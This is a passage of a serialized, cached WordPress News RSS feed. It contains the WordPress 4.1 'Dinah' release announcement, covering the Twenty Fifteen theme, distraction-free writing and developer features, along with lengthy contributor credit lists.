href=\"https://profiles.wordpress.org/ipm-frommen\">Thorsten Frommen</a>, <a href=\"https://profiles.wordpress.org/iseulde\">Iseulde</a>, <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/mattyrob\">mattyrob</a>, <a href=\"https://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/sippis\">sippis</a>, <a href=\"https://profiles.wordpress.org/tmatsuur\">tmatsuur</a>, <a href=\"https://profiles.wordpress.org/tyxla\">Marin Atanasov</a>, <a href=\"https://profiles.wordpress.org/valendesigns\">Derek Herman</a>, and <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>.</p>\n<p>It is with both great honor and sadness we also recognize Kim Parsell as a contributor to this release and a <a href=\"https://make.wordpress.org/docs/2015/01/05/rip-kim-parsell/\">truly beloved member of the community</a> until her untimely passing in December. The project is working to establish a conference travel <a href=\"https://make.wordpress.org/community/2015/01/15/remembering-kim-parsell/\">scholarship</a> in her memory. We miss you, Kim.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2015/02/wordpress-4-1-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:42:\"\n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 4.1 “Dinah”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/news/2014/12/dinah/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/news/2014/12/dinah/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 18:35:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3386\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:360:\"Version 4.1 of WordPress, named “Dinah” in honor of jazz singer Dinah Washington, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style. Introducing Twenty Fifteen Our newest default theme, Twenty Fifteen, is […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:24561:\"<p>Version 4.1 of WordPress, named “Dinah” in honor of jazz singer <a href=\"http://wikipedia.org/wiki/Dinah_Washington\">Dinah Washington</a>, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style.</p>\n<hr />\n<h2 style=\"text-align: center\">Introducing Twenty Fifteen</h2>\n<p><img class=\"aligncenter size-large wp-image-3389\" src=\"https://wordpress.org/news/files/2014/12/2015-laptop-1024x533.png\" alt=\"2015-laptop\" width=\"692\" height=\"360\" /></p>\n<h3>Our newest default theme, Twenty Fifteen, is a blog-focused theme designed for clarity.</h3>\n<p><img class=\"alignright wp-image-3426 size-medium\" src=\"https://wordpress.org/news/files/2014/12/2015-phones-languages-small-300x250.png\" alt=\"\" width=\"300\" height=\"250\" />Twenty Fifteen has flawless language support, with help from <a href=\"https://www.google.com/get/noto/\">Google’s Noto font family</a>.</p>\n<p>The straightforward typography is readable on any screen size.</p>\n<p>Your content always takes center stage, whether viewed on a phone, tablet, laptop, or desktop computer.</p>\n<hr />\n<h2 style=\"text-align: center\">Distraction-free writing</h2>\n<p><img class=\"aligncenter size-large wp-image-3392\" src=\"https://wordpress.org/news/files/2014/12/dfw-screen-1024x614.png\" alt=\"dfw-screen\" width=\"692\" height=\"415\" /></p>\n<h3 style=\"text-align: center\"><em>Just write.</em></h3>\n<p>Sometimes, you just need to concentrate on putting your thoughts into words. Try turning on <strong>distraction-free writing mode</strong>. When you start typing, all the distractions will fade away, letting you focus solely on your writing. All your editing tools instantly return when you need them.</p>\n<hr />\n<h2 style=\"text-align: center\">The Finer Points</h2>\n<h5><strong><img class=\"alignleft wp-image-3405\" src=\"https://wordpress.org/news/files/2014/12/icon-language2.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Choose a language</h5>\n<p>Right now, WordPress 4.1 is already translated into over forty languages, with more always in progress. You can switch to any translation on the General Settings screen.</p>\n<h5><strong><img class=\"alignleft wp-image-3406\" src=\"https://wordpress.org/news/files/2014/12/icon-logout1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Log out everywhere</h5>\n<p>If you’ve ever worried you forgot to sign out from a shared computer, you can now go to your profile and log out everywhere.</p>\n<h5><strong><img class=\"alignleft wp-image-3407\" src=\"https://wordpress.org/news/files/2014/12/icon-vine1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Vine embeds</h5>\n<p>Embedding videos from Vine is as simple as pasting a URL onto its own line in a post. See the <a href=\"https://codex.wordpress.org/Embeds\">full list</a> of supported embeds.</p>\n<h5><strong><img class=\"alignleft wp-image-3408\" src=\"https://wordpress.org/news/files/2014/12/icon-recommended1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Plugin recommendations</h5>\n<p>The plugin installer suggests plugins for you to try. Recommendations are based on the plugins you and other users have installed.</p>\n<hr />\n<h2 style=\"text-align: center\">Under the Hood</h2>\n<h5>Complex Queries</h5>\n<p>Metadata, date, and term queries now support advanced conditional logic, like nested clauses and multiple operators — <code>A AND ( B OR C )</code>.</p>\n<h5>Customizer API</h5>\n<p>The customizer now supports conditionally showing panels and sections based on the page being previewed.</p>\n<h5><code><title></code> tags in themes</h5>\n<p><code>add_theme_support( \'title-tag\' )</code> tells WordPress to handle the complexities of document titles.</p>\n<h5>Developer Reference</h5>\n<p>Continued improvements to inline code documentation have made the <a href=\"https://developer.wordpress.org/reference/\">developer reference</a> more complete than ever.</p>\n<hr />\n<h2 style=\"text-align: center\">The Choir</h2>\n<p>This release was led by <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, with the help of these awesome folks. Check out some of their profiles while listening to Dinah Washington on the music service of your choice:</p>\n<a href=\"https://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/akumria\">akumria</a>, <a href=\"https://profiles.wordpress.org/xknown\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"https://profiles.wordpress.org/tellyworth\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/collinsinternet\">Allan Collins</a>, <a href=\"https://profiles.wordpress.org/momo360modena\">Amaury Balmer</a>, <a href=\"https://profiles.wordpress.org/amruta123b\">Amruta Bhosale</a>, <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andg\">Andrea Gandino</a>, <a href=\"https://profiles.wordpress.org/sumobi\">Andrew Munro (sumobi)</a>, <a href=\"https://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/andrewryno\">Andrew Ryno</a>, <a href=\"https://profiles.wordpress.org/rarst\">Andrey \"Rarst\" Savchenko</a>, <a href=\"https://profiles.wordpress.org/ankitgadertcampcom\">Ankit Gade</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/antpb\">Anthony Burchell</a>, <a href=\"https://profiles.wordpress.org/arippberger\">arippberger</a>, <a href=\"https://profiles.wordpress.org/filosofo\">Austin Matzko</a>, <a href=\"https://profiles.wordpress.org/bainternet\">Bainternet</a>, <a href=\"https://profiles.wordpress.org/barrykooij\">Barry Kooij</a>, <a href=\"https://profiles.wordpress.org/empireoflight\">Ben Dunkle</a>, <a href=\"https://profiles.wordpress.org/benjmay\">Ben May</a>, <a href=\"https://profiles.wordpress.org/neoxx\">Bernhard Riedl</a>, <a href=\"https://profiles.wordpress.org/birgire\">Birgir Erlendsson (birgire)</a>, <a href=\"https://profiles.wordpress.org/bobbingwide\">bobbingwide</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">Boone B. Gorges</a>, <a href=\"https://profiles.wordpress.org/bradyvercher\">Brady Vercher</a>, <a href=\"https://profiles.wordpress.org/bramd\">Bram Duvigneau</a>, <a href=\"https://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/briandichiara\">Brian DiChiara</a>, <a href=\"https://profiles.wordpress.org/rzen\">Brian Richards</a>, <a href=\"https://profiles.wordpress.org/bswatson\">Brian Watson</a>, <a href=\"https://profiles.wordpress.org/camdensegal\">Camden Segal</a>, <a href=\"https://profiles.wordpress.org/captaintheme\">Captain Theme</a>, <a href=\"https://profiles.wordpress.org/hiwhatsup\">Carlos</a>, <a href=\"https://profiles.wordpress.org/caspie\">Caspie</a>, <a href=\"https://profiles.wordpress.org/ccprice\">ccprice</a>, <a href=\"https://profiles.wordpress.org/mackensen\">Charles Fulton</a>, <a href=\"https://profiles.wordpress.org/chrico\">ChriCo</a>, <a href=\"https://profiles.wordpress.org/aprea\">Chris Aprea</a>, <a href=\"https://profiles.wordpress.org/chrisbliss18\">Chris Jean</a>, <a href=\"https://profiles.wordpress.org/cmmarslender\">Chris Marslender</a>, <a href=\"https://profiles.wordpress.org/jazzs3quence\">Chris Reynolds</a>, <a href=\"https://profiles.wordpress.org/chriscct7\">chriscct7</a>, <a href=\"https://profiles.wordpress.org/chrisl27\">chrisl27</a>, <a href=\"https://profiles.wordpress.org/cfoellmann\">Christian Foellmann</a>, <a href=\"https://profiles.wordpress.org/cfinke\">Christopher Finke</a>, <a href=\"https://profiles.wordpress.org/cyclometh\">Corey Snow</a>, <a href=\"https://profiles.wordpress.org/corphi\">Corphi</a>, <a href=\"https://profiles.wordpress.org/curtjen\">curtjen</a>, <a href=\"https://profiles.wordpress.org/colorful-tones\">Damon Cook</a>, <a href=\"https://profiles.wordpress.org/dancameron\">Dan Cameron</a>, <a href=\"https://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"https://profiles.wordpress.org/convissor\">Daniel Convissor</a>, <a href=\"https://profiles.wordpress.org/nerrad\">Darren Ethier (nerrad)</a>, <a href=\"https://profiles.wordpress.org/koop\">Daryl Koopersmith</a>, <a href=\"https://profiles.wordpress.org/dmchale\">Dave McHale</a>, <a href=\"https://profiles.wordpress.org/davidakennedy\">David A. Kennedy</a>, <a href=\"https://profiles.wordpress.org/dcavins\">David Cavins</a>, <a href=\"https://profiles.wordpress.org/dlh\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/davidjlaietta\">David Laietta</a>, <a href=\"https://profiles.wordpress.org/technical_mastermind\">David Wood</a>, <a href=\"https://profiles.wordpress.org/davidthemachine\">DavidTheMachine</a>, <a href=\"https://profiles.wordpress.org/realloc\">Dennis Ploetner</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/wedi\">Dirk Weise</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/dominikschwind-1\">Dominik Schwind</a>, <a href=\"https://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"https://profiles.wordpress.org/dustyf\">Dustin Filippini</a>, <a href=\"https://profiles.wordpress.org/dustinhartzler\">Dustin Hartzler</a>, <a href=\"https://profiles.wordpress.org/eliorivero\">Elio Rivero</a>, <a href=\"https://profiles.wordpress.org/ebinnion\">Eric Binnion</a>, <a href=\"https://profiles.wordpress.org/ew_holmes\">Eric Holmes</a>, <a href=\"https://profiles.wordpress.org/ericlewis\">Eric Lewis</a>, <a href=\"https://profiles.wordpress.org/fab1en\">Fabien Quatravaux</a>, <a href=\"https://profiles.wordpress.org/florianziegler\">florianziegler</a>, <a href=\"https://profiles.wordpress.org/hereswhatidid\">Gabe Shackle</a>, <a href=\"https://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"https://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/soulseekah\">Gennady Kovshenin</a>, <a href=\"https://profiles.wordpress.org/babbardel\">George Olaru</a>, <a href=\"https://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"https://profiles.wordpress.org/gregrickaby\">Greg Rickaby</a>, <a href=\"https://profiles.wordpress.org/gcorne\">Gregory Cornelius</a>, <a href=\"https://profiles.wordpress.org/tivnet\">Gregory Karpinsky (@tivnet)</a>, <a href=\"https://profiles.wordpress.org/bordoni\">Gustavo Bordoni</a>, <a href=\"https://profiles.wordpress.org/hardy101\">hardy101</a>, <a href=\"https://profiles.wordpress.org/hauvong\">hauvong</a>, <a href=\"https://profiles.wordpress.org/helen\">Helen Hou-Sandí</a>, <a href=\"https://profiles.wordpress.org/heshiming\">heshiming</a>, <a href=\"https://profiles.wordpress.org/honeysilvas\">honeysilvas</a>, <a href=\"https://profiles.wordpress.org/hugodelgado\">hugodelgado</a>, <a href=\"https://profiles.wordpress.org/iandstewart\">Ian Stewart</a>, <a href=\"https://profiles.wordpress.org/ianmjones\">ianmjones</a>, <a href=\"https://profiles.wordpress.org/igmoweb\">Ignacio Cruz Moreno</a>, <a href=\"https://profiles.wordpress.org/imath\">imath</a>, <a href=\"https://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"https://profiles.wordpress.org/ivankristianto\">Ivan Kristianto</a>, <a href=\"https://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a>, <a href=\"https://profiles.wordpress.org/jaimieolmstead\">jaimieolmstead</a>, <a href=\"https://profiles.wordpress.org/jakubtyrcha\">jakub.tyrcha</a>, <a href=\"https://profiles.wordpress.org/janhenckens\">janhenckens</a>, <a href=\"https://profiles.wordpress.org/avryl\">Janneke Van Dorpe</a>, <a href=\"https://profiles.wordpress.org/japh\">Japh</a>, <a href=\"https://profiles.wordpress.org/jwenerd\">Jared Wenerd</a>, <a href=\"https://profiles.wordpress.org/jarednova\">jarednova</a>, <a href=\"https://profiles.wordpress.org/jeanyoungkim\">jeanyoungkim</a>, <a href=\"https://profiles.wordpress.org/jfarthing84\">Jeff Farthing</a>, <a href=\"https://profiles.wordpress.org/jeffstieler\">Jeff Stieler</a>, <a href=\"https://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"https://profiles.wordpress.org/jeherve\">Jeremy Herve</a>, <a href=\"https://profiles.wordpress.org/jesin\">Jesin A</a>, <a href=\"https://profiles.wordpress.org/jayjdk\">Jesper Johansen (jayjdk)</a>, <a href=\"https://profiles.wordpress.org/engelen\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jessepollak\">Jesse Pollak</a>, <a href=\"https://profiles.wordpress.org/jipmoors\">jipmoors</a>, <a href=\"https://profiles.wordpress.org/joedolson\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joemcgill\">Joe McGill</a>, <a href=\"https://profiles.wordpress.org/johneckman\">John Eckman</a>, <a href=\"https://profiles.wordpress.org/johnrom\">johnrom</a>, <a href=\"https://profiles.wordpress.org/johnstonphilip\">johnstonphilip</a>, <a href=\"https://profiles.wordpress.org/jb510\">Jon Brown</a>, <a href=\"https://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"https://profiles.wordpress.org/jbrinley\">Jonathan Brinley</a>, <a href=\"https://profiles.wordpress.org/desrosj\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/joostdevalk\">Joost de Valk</a>, <a href=\"https://profiles.wordpress.org/softmodeling\">Jordi Cabot</a>, <a href=\"https://profiles.wordpress.org/joshuaabenazer\">Joshua Abenazer</a>, <a href=\"https://profiles.wordpress.org/tai\">JOTAKI Taisuke</a>, <a href=\"https://profiles.wordpress.org/jrf\">jrf</a>, <a href=\"https://profiles.wordpress.org/julien731\">Julien Liabeuf</a>, <a href=\"https://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"https://profiles.wordpress.org/jtsternberg\">Justin Sternberg</a>, <a href=\"https://profiles.wordpress.org/kadamwhite\">K.Adam White</a>, <a href=\"https://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"https://profiles.wordpress.org/kamelkev\">kamelkev</a>, <a href=\"https://profiles.wordpress.org/karpstrucking\">karpstrucking</a>, <a href=\"https://profiles.wordpress.org/keesiemeijer\">keesiemeijer</a>, <a href=\"https://profiles.wordpress.org/ryelle\">Kelly Dwan</a>, <a href=\"https://profiles.wordpress.org/kevinlangleyjr\">Kevin Langley</a>, <a href=\"https://profiles.wordpress.org/kdoran\">Kiko Doran</a>, <a href=\"https://profiles.wordpress.org/kpdesign\">Kim Parsell</a>, <a href=\"https://profiles.wordpress.org/kwight\">Kirk Wight</a>, <a href=\"https://profiles.wordpress.org/kitchin\">kitchin</a>, <a href=\"https://profiles.wordpress.org/ixkaito\">Kite</a>, <a href=\"https://profiles.wordpress.org/knutsp\">Knut Sparhell</a>, <a href=\"https://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"https://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/kosvrouvas\">Kostas Vrouvas</a>, <a href=\"https://profiles.wordpress.org/kristastevens\">kristastevens</a>, <a href=\"https://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"https://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"https://profiles.wordpress.org/offereins\">Laurens Offereins</a>, <a href=\"https://profiles.wordpress.org/linuxologos\">linuxologos</a>, <a href=\"https://profiles.wordpress.org/ideag\">Liuiza Arunas</a>, <a href=\"https://profiles.wordpress.org/loushou\">loushou</a>, <a href=\"https://profiles.wordpress.org/latz\">Lutz Schroer</a>, <a href=\"https://profiles.wordpress.org/manoz69\">Manoz69</a>, <a href=\"https://profiles.wordpress.org/mantismamita\">mantismamita</a>, <a href=\"https://profiles.wordpress.org/marcosf\">Marco Schmoecker</a>, <a href=\"https://profiles.wordpress.org/nofearinc\">Mario Peshev</a>, <a href=\"https://profiles.wordpress.org/clorith\">Marius (Clorith)</a>, <a href=\"https://profiles.wordpress.org/landakram\">Mark Hudnall</a>, <a href=\"https://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"https://profiles.wordpress.org/senff\">Mark Senff</a>, <a href=\"https://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"https://profiles.wordpress.org/marsjaninzmarsa\">marsjaninzmarsa</a>, <a href=\"https://profiles.wordpress.org/matveb\">Matias Ventura</a>, <a href=\"https://profiles.wordpress.org/matt\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/mattwiebe\">Matt Wiebe</a>, <a href=\"https://profiles.wordpress.org/mboynes\">Matthew Boynes</a>, <a href=\"https://profiles.wordpress.org/mattheu\">Matthew Haines-Young</a>, <a href=\"https://profiles.wordpress.org/mattkeys\">mattkeys</a>, <a href=\"https://profiles.wordpress.org/mlteal\">Maura Teal</a>, <a href=\"https://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"https://profiles.wordpress.org/merty\">Mert Yazicioglu</a>, <a href=\"https://profiles.wordpress.org/mdawaffe\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/michael-arestad\">Michael Arestad</a>, <a href=\"https://profiles.wordpress.org/tw2113\">Michael Beckwith</a>, <a href=\"https://profiles.wordpress.org/cainm\">Michael Cain</a>, <a href=\"https://profiles.wordpress.org/smashcut\">Michael Pick</a>, <a href=\"https://profiles.wordpress.org/michalzuber\">michalzuber</a>, <a href=\"https://profiles.wordpress.org/chellycat\">Michelle Langston</a>, <a href=\"https://profiles.wordpress.org/mcsf\">Miguel Fonseca</a>, <a href=\"https://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"https://profiles.wordpress.org/mikejolley\">Mike Jolley</a>, <a href=\"https://profiles.wordpress.org/mnelson4\">Mike Nelson</a>, <a href=\"https://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/mikeyarce\">Mikey Arce</a>, <a href=\"https://profiles.wordpress.org/studionashvegas\">Mitch Canter (studionashvegas)</a>, <a href=\"https://profiles.wordpress.org/morganestes\">Morgan Estes</a>, <a href=\"https://profiles.wordpress.org/mor10\">Morten Rand-Hendriksen</a>, <a href=\"https://profiles.wordpress.org/mvd7793\">mvd7793</a>, <a href=\"https://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"https://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"https://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"https://profiles.wordpress.org/nikv\">Nikhil Vimal</a>, <a href=\"https://profiles.wordpress.org/nikolovtmw\">Nikola Nikolov</a>, <a href=\"https://profiles.wordpress.org/nobleclem\">nobleclem</a>, <a href=\"https://profiles.wordpress.org/noplanman\">noplanman</a>, <a href=\"https://profiles.wordpress.org/nvwd\">Nowell VanHoesen</a>, <a href=\"https://profiles.wordpress.org/originalexe\">OriginalEXE</a>, <a href=\"https://profiles.wordpress.org/p_enrique\">p_enrique</a>, <a href=\"https://profiles.wordpress.org/pushplaybang\">Paul</a>, <a href=\"https://profiles.wordpress.org/pauldewouters\">Paul de Wouters</a>, <a href=\"https://profiles.wordpress.org/paulschreiber\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulwilde\">Paul Wilde</a>, <a href=\"https://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/peterchester\">Peter Chester</a>, <a href=\"https://profiles.wordpress.org/donutz\">Peter J. Herrel</a>, <a href=\"https://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/philiparthurmoore\">Philip Arthur Moore</a>, <a href=\"https://profiles.wordpress.org/phpmypython\">phpmypython</a>, <a href=\"https://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"https://profiles.wordpress.org/nprasath002\">Prasath Nadarajah</a>, <a href=\"https://profiles.wordpress.org/psycleuk\">psycleuk</a>, <a href=\"https://profiles.wordpress.org/ptahdunbar\">Ptah Dunbar</a>, <a href=\"https://profiles.wordpress.org/quietnic\">quietnic</a>, <a href=\"https://profiles.wordpress.org/rachelbaker\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/ramiy\">Rami Yushuvaev</a>, <a href=\"https://profiles.wordpress.org/ramiabraham\">ramiabraham</a>, <a href=\"https://profiles.wordpress.org/greuben\">Reuben Gunday</a>, <a href=\"https://profiles.wordpress.org/rianrietveld\">Rian Rietveld</a>, <a href=\"https://profiles.wordpress.org/richardmtl\">Richard Archambault</a>, <a href=\"https://profiles.wordpress.org/rickalee\">Ricky Lee Whittemore</a>, <a href=\"https://profiles.wordpress.org/miqrogroove\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/rodrigosprimo\">Rodrigo Primo</a>, <a href=\"https://profiles.wordpress.org/ryan\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/ryankienstra\">Ryan Kienstra</a>, <a href=\"https://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/sakinshrestha\">Sakin Shrestha</a>, <a href=\"https://profiles.wordpress.org/samhotchkiss\">Sam Hotchkiss</a>, <a href=\"https://profiles.wordpress.org/otto42\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/sc0ttkclark\">Scott Kingsley Clark</a>, <a href=\"https://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shooper\">Shawn Hooper</a>, <a href=\"https://profiles.wordpress.org/simonp303\">Simon Pollard</a>, <a href=\"https://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/skaeser\">skaeser</a>, <a href=\"https://profiles.wordpress.org/slobodanmanic\">Slobodan Manic</a>, <a href=\"https://profiles.wordpress.org/socki03\">socki03</a>, <a href=\"https://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"https://profiles.wordpress.org/stephdau\">Stephane Daury</a>, <a href=\"https://profiles.wordpress.org/netweb\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stephenharris\">Stephen Harris</a>, <a href=\"https://profiles.wordpress.org/stevegrunwell\">Steve Grunwell</a>, <a href=\"https://profiles.wordpress.org/5um17\">Sumit Singh</a>, <a href=\"https://profiles.wordpress.org/tacoverdo\">TacoVerdo</a>, <a href=\"https://profiles.wordpress.org/iamtakashi\">Takashi Irie</a>, <a href=\"https://profiles.wordpress.org/miyauchi\">Takayuki Miyauchi</a>, <a href=\"https://profiles.wordpress.org/karmatosed\">Tammie</a>, <a href=\"https://profiles.wordpress.org/tareq1988\">Tareq Hasan</a>, <a href=\"https://profiles.wordpress.org/tlovett1\">Taylor Lovett</a>, <a href=\"https://profiles.wordpress.org/kraftner\">Thomas Kraftner</a>, <a href=\"https://profiles.wordpress.org/ipm-frommen\">Thorsten Frommen</a>, <a href=\"https://profiles.wordpress.org/tillkruess\">Till</a>, <a href=\"https://profiles.wordpress.org/tschutter\">Tobias Schutter</a>, <a href=\"https://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tmtrademark\">Toby McKes</a>, <a href=\"https://profiles.wordpress.org/tjnowell\">Tom J Nowell</a>, <a href=\"https://profiles.wordpress.org/tomasm\">Tomas Mackevicius</a>, <a href=\"https://profiles.wordpress.org/tomharrigan\">TomHarrigan</a>, <a href=\"https://profiles.wordpress.org/topher1kenobe\">Topher</a>, <a href=\"https://profiles.wordpress.org/zodiac1978\">Torsten Landsiedel</a>, <a href=\"https://profiles.wordpress.org/liljimmi\">Tracy Levesque</a>, <a href=\"https://profiles.wordpress.org/transom\">transom</a>, <a href=\"https://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"https://profiles.wordpress.org/tywayne\">Ty Carlson</a>, <a href=\"https://profiles.wordpress.org/desaiuditd\">Udit Desai</a>, <a href=\"https://profiles.wordpress.org/umeshsingla\">Umesh Kumar</a>, <a href=\"https://profiles.wordpress.org/vinod-dalvi\">Vinod Dalvi</a>, <a href=\"https://profiles.wordpress.org/vlajos\">vlajos</a>, <a href=\"https://profiles.wordpress.org/voldemortensen\">voldemortensen</a>, <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, <a 